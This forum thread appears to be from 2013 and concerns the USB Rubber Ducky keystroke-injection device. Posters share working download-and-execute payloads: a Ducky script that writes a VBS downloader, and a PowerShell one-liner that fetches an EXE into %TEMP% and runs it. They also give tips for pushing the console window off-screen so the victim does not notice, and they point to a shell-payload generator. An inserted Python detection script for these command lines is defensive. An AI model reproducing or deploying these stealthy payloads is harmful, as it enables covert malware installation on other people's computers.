crashie Posted March 6, 2013

Hi, I'm new to the ducky, just got it today :P

I am trying to get it to download an executable file from a http and then execute it. Have seen the payload called "Ducky Downloader" and it works, but not in the background, instead the CMD pops up and is visible during the whole time until it's finished doing what it should do, download and execute.

Isn't there a way to do this in the background so that it doesn't get noticed?

Thanks in advance! / Crashie

Btw, this is the script I'm talking about:

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <INSERT URL HERE>
ENTER
STRING <INSERT EXE FILENAME HERE>
ENTER
STRING exit
ENTER

Edited March 6, 2013 by midnitesnake (formatting)

no42 Posted March 6, 2013

The problem is, the ducky relies on HID injection (keyboard injection), so it needs the focus of the current window to operate correctly (just like macros). As soon as your window focus changes, the payload will cease to function correctly, as the payload will be split between 2+ windows.

The advantage is the Ducky types really fast, so just alt-f4 to close the window once the payload is complete, and hopefully no one will be the wiser (or they're distracted or AFK) and completely miss the command prompt.

Alternatively - use the twin-duck firmware to execute directly from the sdcard! Saves from downloading (time/bandwidth), or even a valid http connection ;)

Edited March 6, 2013 by midnitesnake

crashie (Author) Posted March 6, 2013

Hi and thanks for your response!

So, whatever I do with the rubber ducky it will always be shown on the actual computer? And there is no way to hide the windows?

I tried the RunEXE script (and have installed twin duck firmware, the special version 1 that runs the payload when CAPS is pressed) but when I did that it just opened up a hell of a lot of windows and the registry and some programs and did not execute my file. So I don't know what went wrong there.

Appreciate any help given. And sorry for being such a newbie :P But one has to start somewhere ;)

/crashie

h4x0r666 Posted March 7, 2013

I posted a large payload somewhere with different possibilities on how to hide it, where only one worked for me xD I don't remember it though, but I guess I did it by entering the move command prompt option and then just very fast inserting some down keys to hide it beneath your screen while it does the rest.

overwraith Posted March 7, 2013

There are ways to hide the command prompt below the bottom or side of the screen. With the new duckscript compiler, the "REPEAT" command is now included, and here's a link to the hide CMD window payload:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window

More recently I combined the window hiding action with someone's powershell wget and execute:

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI R
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
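
From the defender's side, both download-and-run command lines posted in this thread (the `cscript download.vbs <url>` call and the PowerShell WebClient one-liner) leave recognisable process-creation records however briefly the window is on screen. The following is an added example, not part of any post in this thread: a Python triage over constructed events using Sysmon-style `ParentImage` and `CommandLine` fields; the rule names, severity labels and sample events are assumptions.

```python
import re

# Added example: rule names and events below are constructed for illustration.
RULES = {
    # PowerShell one-liner using System.Net.WebClient.DownloadFile
    "ps_webclient_download": re.compile(
        r"powershell(\.exe)?\b.*net\.webclient.*\.downloadfile\s*\(", re.I),
    # download chained straight into Start-Process on the same command line
    "ps_download_then_start": re.compile(
        r"\.downloadfile\s*\(.*;\s*start-process\b", re.I),
    # cscript/wscript handed a .vbs script plus an http(s) URL argument
    "script_host_url_arg": re.compile(
        r"\b[cw]script(\.exe)?\b.*\.vbs\b.*https?://", re.I),
    # executable path under the user's temp directory
    "exe_in_temp": re.compile(
        r"(%temp%|\\appdata\\local\\temp)\\\S+?\.exe", re.I),
}
# Parents expected when a command is typed into the Run dialog or a console.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

def triage(event):
    """Return (severity, rule hits) for one process-creation event."""
    hits = sorted(n for n, rx in RULES.items() if rx.search(event["CommandLine"]))
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if hits and parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    if "ps_download_then_start" in hits or "script_host_url_arg" in hits:
        return "high", hits
    return ("medium" if hits else None), hits

TEMP = r"C:\Users\u\AppData\Local\Temp\bob.exe"
SAMPLE_EVENTS = [  # constructed; field names follow Sysmon event ID 1
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell (new-object System.Net.WebClient)"
                    f".DownloadFile('http://example.com/bob.old','{TEMP}');"
                    f' Start-Process "{TEMP}"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cscript download.vbs http://example.com/tool.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript C:\Windows\System32\slmgr.vbs /dli"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), ev["CommandLine"][:60])
```

The last two sample events are ordinary PowerShell and `cscript` use and produce no hits, which is the false-positive check worth keeping when the patterns are tuned.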

skysploit Posted March 11, 2013

You can download the simple-ducky payload generator. It has two different versions of the download and execute payload built in. One will yield you a User priv shell and the other an Admin priv shell.

Here's the link: https://code.google.com/p/simple-ducky-payload-generator/

~skysploit